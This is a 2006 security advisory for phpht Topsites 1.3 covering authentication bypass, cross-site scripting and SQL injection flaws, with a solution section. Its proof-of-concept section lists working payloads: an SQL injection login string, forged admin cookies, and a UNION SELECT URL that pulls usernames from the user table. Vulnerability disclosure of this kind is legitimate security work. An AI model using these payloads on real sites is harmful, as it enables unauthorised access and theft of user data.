Multiple Vulnerabilities in phpht Topsites

Summary

Vulnerability
Multiple Vulnerabilities in phpht Topsites
Discovered
2006.02.04
Last Update
2006.03.18 Solution added
ID
EV0059
CVE
CVE-2006-0653 CVE-2006-0654 CVE-2006-0655
Risk Level
medium
Type
Multiple Vulnerabilities
Status
Patched
Vendor
Hinton Design (http://www.hintondesign.org)
Vulnerable Software
phpht Topsites (http://www.hintondesign.org/downloads/view_cat.php?cat_id=76)
Version
1.3
PoC/Exploit
Available
Solution
Available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in phpht Topsites (http://www.hintondesign.org/downloads/view_cat.php?cat_id=76) script.

1. Authentication Bypass
Vulnerable script: check.php

There are two ways to bypass authentication:

a) SQL Injection
Variable $HTTP_POST_VARS[username] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off

b) Cookie based authentication
check.php script dont make password comparisson when identifying user by cookies


2. Multiple Cross-Site Scripting
Vulnerable scripts: link_edited.php link_added.php
Most of user-defined data isn't properly sanitized. This can be used to post arbitrary html or script code.


3. Multiple SQL Injections
Vulnerable scripts: all scripts showing some data from database
Most of user-defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off

PoC/Exploit

1. Authentication Bypass

a) SQL Injection
url: http://host/ht/admin.php
Username: ' or 1/*
Password: any

b) Cookie based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1
Cookie: userid=1


2. Cross-Site Scripting Example.
Url:
http://host/phpht/add_link.php
or
http://host/phpht/edit_link.php

Website: <XSS>
Website description: <XSS>


3. SQL Injection Example:
http://host/phpht/link.php?id=99'%20union%20select%201,username,3,4,5,6,7,8,9,10,11 from phpht_users/*

Solution.

To fix this problem install or upgrade to latest version provided by vendor.